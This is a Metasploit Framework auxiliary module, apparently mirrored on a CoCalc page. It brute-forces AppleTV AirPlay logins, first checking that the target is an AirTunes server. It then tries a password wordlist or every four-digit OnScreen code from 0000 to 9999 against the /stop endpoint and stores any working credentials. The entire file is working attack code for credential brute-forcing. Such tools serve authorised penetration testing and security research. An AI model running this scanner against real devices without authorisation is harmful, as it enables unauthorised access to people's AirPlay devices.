Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/http/appletv_login.rb
76140 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'metasploit/framework/credential_collection'

7
require 'metasploit/framework/login_scanner/http'

8


9
class MetasploitModule < Msf::Auxiliary

10
  include Msf::Exploit::Remote::HttpClient

11
  include Msf::Auxiliary::Report

12
  include Msf::Auxiliary::AuthBrute

13
  include Msf::Auxiliary::Scanner

14


15
  def initialize

16
    super(

17
      'Name' => 'AppleTV AirPlay Login Utility',

18
      'Description' => %q(

19
        This module attempts to authenticate to an AppleTV service with

20
        the username, 'AirPlay'.  The device has two different access control

21
        modes: OnScreen and Password. The difference between the two is the

22
        password in OnScreen mode is numeric-only and four digits long, which

23
        means when this option is enabled, this option, the module will make

24
        sure to cover all of them - from 0000 to 9999.  The Password mode is

25
        more complex, therefore the usual online bruteforce strategies apply.

26
      ),

27
      'Author' => [

28
        '0a29406d9794e4f9b30b3c5d6702c708', # Original

29
        'thelightcosine' # LoginScanner conversion help

30
      ],

31
      'License' => MSF_LICENSE,

32
      'References' => [

33
        ['URL', 'http://nto.github.io/AirPlay.html']

34
      ],

35
      'DefaultOptions' => {

36
        'RPORT' => 7000, # AppleTV's server

37
        'STOP_ON_SUCCESS' => true # There's only one password with the same username

38
      }

39
    )

40


41
    register_options(

42
      [

43
        OptBool.new('Onscreen', [false, 'Enable if AppleTV is using the Onscreen access control', false]),

44
        OptPath.new('PASS_FILE', [

45
          false,

46
          'File containing passwords, one per line',

47
          File.join(Msf::Config.data_directory, 'wordlists', 'http_default_pass.txt')

48
        ])

49
      ]

50
    )

51


52
    deregister_options(

53
      'USERNAME', 'USER_AS_PASS', 'DB_ALL_CREDS', 'DB_ALL_USERS', 'DB_SKIP_EXISTING',

54
      'NTLM::SendLM', 'NTLM::SendNTLM', 'NTLM::SendSPN', 'NTLM::UseLMKey', 'NTLM::UseNTLM2_session', 'NTLM::UseNTLMv2',

55
      'REMOVE_USERPASS_FILE', 'REMOVE_USER_FILE', 'DOMAIN', 'HttpUsername'

56
    )

57
  end

58


59
  def run_host(ip)

60
    res = send_request_cgi({

61
      'method' => 'GET',

62
      'uri'    => '/server-info'

63
    })

64


65
    unless res

66
      print_error("#{peer} - Could not connect to the AppleTV service")

67
      return

68
    end

69


70
    unless res.headers['Server']&.include?('AirTunes')

71
      print_error("#{peer} - Host does not appear to be an AppleTV AirPlay device. Module will not continue.")

72
      return

73
    end

74


75
    uri = "/stop"

76
    if datastore['PASS_FILE'] && !datastore['PASS_FILE'].empty?

77
      print_status("Attempting to login to #{uri} using password list")

78
      cred_collection = Metasploit::Framework::CredentialCollection.new(

79
        blank_passwords: datastore['BLANK_PASSWORDS'],

80
        pass_file: datastore['PASS_FILE'],

81
        username: 'AirPlay',

82
        user_as_pass: datastore['USER_AS_PASS']

83
      )

84
      cred_collection = prepend_db_passwords(cred_collection)

85
    else

86
      print_status("Attempting to login to #{uri} by 'Onscreen Code'")

87
      cred_collection = LockCodeCollection.new

88
    end

89


90
    scanner = Metasploit::Framework::LoginScanner::HTTP.new(

91
      configure_http_login_scanner(

92
        uri: "/stop",

93
        cred_details: cred_collection,

94
        stop_on_success: datastore['STOP_ON_SUCCESS'],

95
        bruteforce_speed: datastore['BRUTEFORCE_SPEED'],

96
        connection_timeout: 5

97
      )

98
    )

99


100
    scanner.scan! do |result|

101
      credential_data = result.to_h

102
      credential_data.merge!(

103
        module_fullname: self.fullname,

104
        workspace_id: myworkspace_id,

105
        service_name: 'airplay'

106
      )

107
      case result.status

108
      when Metasploit::Model::Login::Status::SUCCESSFUL

109
        print_brute :level => :good, :ip => ip, :msg => "Success: '#{result.credential}'"

110
        credential_core = create_credential(credential_data)

111
        credential_data[:core] = credential_core

112
        create_credential_login(credential_data)

113
        :next_user

114
      when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT

115
        print_brute :level => :verror, :ip => ip, :msg => "Could not connect"

116
        invalidate_login(credential_data)

117
        :abort

118
      when Metasploit::Model::Login::Status::INCORRECT

119
        print_brute :level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'"

120
        invalidate_login(credential_data)

121
      when Metasploit::Model::Login::Status::NO_AUTH_REQUIRED

122
        print_brute :level => :error, :ip => ip, :msg => "NO AUTH REQUIRED: '#{result.credential}'"

123
        break

124
      end

125
    end

126
  end

127


128
  # This class is just a faster way of doing our LockCode enumeration. We could just stick this into

129
  # a CredentialCollection, but since we have a pre-set range we iterate through, it is easier to do it

130
  # at runtime.

131
  class LockCodeCollection

132


133
    def each

134
      (0..9999).each do |pass|

135
        screen_code = Metasploit::Framework::Credential.new(public: 'AirPlay', private: pass.to_s.rjust(4, '0'), realm: nil, private_type: :password)

136
        yield screen_code

137
      end

138
    end

139
  end

140
end

141


142